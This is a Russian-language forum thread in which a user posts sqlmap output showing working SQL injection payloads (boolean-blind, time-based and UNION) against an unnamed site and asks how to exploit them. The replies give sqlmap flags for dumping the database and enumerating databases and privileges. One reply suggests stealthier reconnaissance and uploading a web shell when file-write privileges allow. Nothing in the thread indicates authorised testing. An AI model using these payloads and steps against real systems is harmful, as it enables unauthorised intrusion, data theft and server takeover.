Как использовать иньекции которые предоставил sqlmap?

g00db0y

Red Team
11.06.2018
139
689
Добрый день!
При работе с sqlmap, мне выдало следующее:
Код:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY

    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=56' AND 7536=BENCHMARK(5000000,MD5(0x48444365)) AND 'FSfa'='FSfa
   
    Type: UNION query
    Title: MySQL UNION query (NULL) - 26 columns
    Payload: id=-6433' UNION ALL SELECT  NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6a6b71,0x717a6654616a7250436d4f46594972424768546c65456a425a484a504b6e6362454f6b4d50425851,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL#
Подскажите, как это можно эксплуатировать?
 
Добрый день!
При работе с sqlmap, мне выдало следующее:
Код:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY

    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=56' AND 7536=BENCHMARK(5000000,MD5(0x48444365)) AND 'FSfa'='FSfa
  
    Type: UNION query
    Title: MySQL UNION query (NULL) - 26 columns
    Payload: id=-6433' UNION ALL SELECT  NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6a6b71,0x717a6654616a7250436d4f46594972424768546c65456a425a484a504b6e6362454f6b4d50425851,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL#
Подскажите, как это можно эксплуатировать?
Например подставить значение поля payload в url?
 
  • Нравится
Реакции: Сергей Попов
А зачем тебе в урл добавлять, раскрути sqlmap там же есть специальная функция, почитай help
 
  • Нравится
Реакции: g00db0y
сразу берешь и добавляешь --dump, если он раскрутит уязвимость, сразу тебе и дамп сделает если сможет
 
  • Нравится
Реакции: g00db0y и pr0phet
сразу берешь и добавляешь --dump, если он раскрутит уязвимость, сразу тебе и дамп сделает если сможет
Я обычно добавляю что-то типа --current-user. Менее палево, нежели делать вероятно ненужный дамп. Лучше руками побегать по таблицам посмотреть что есть. Если filepriv позволяет писать файлы - заливаем шелл - дампим базу не селектами. (сценарий из разряда "как в сказке :-)")
 
Последнее редактирование:
  • Нравится
Реакции: g00db0y и IioS
Parameter: id (GET)


sqlmap.py -u " " --level 3 --risk 3 --threads 10 --is-dba --dbs --random-agent
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!